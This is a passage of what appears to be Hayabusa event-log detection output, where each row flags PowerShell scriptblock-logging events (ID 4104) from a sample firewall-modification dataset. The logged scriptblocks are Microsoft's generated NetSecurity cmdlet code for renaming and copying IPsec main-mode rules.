$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName ))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] 
${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', 
SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true 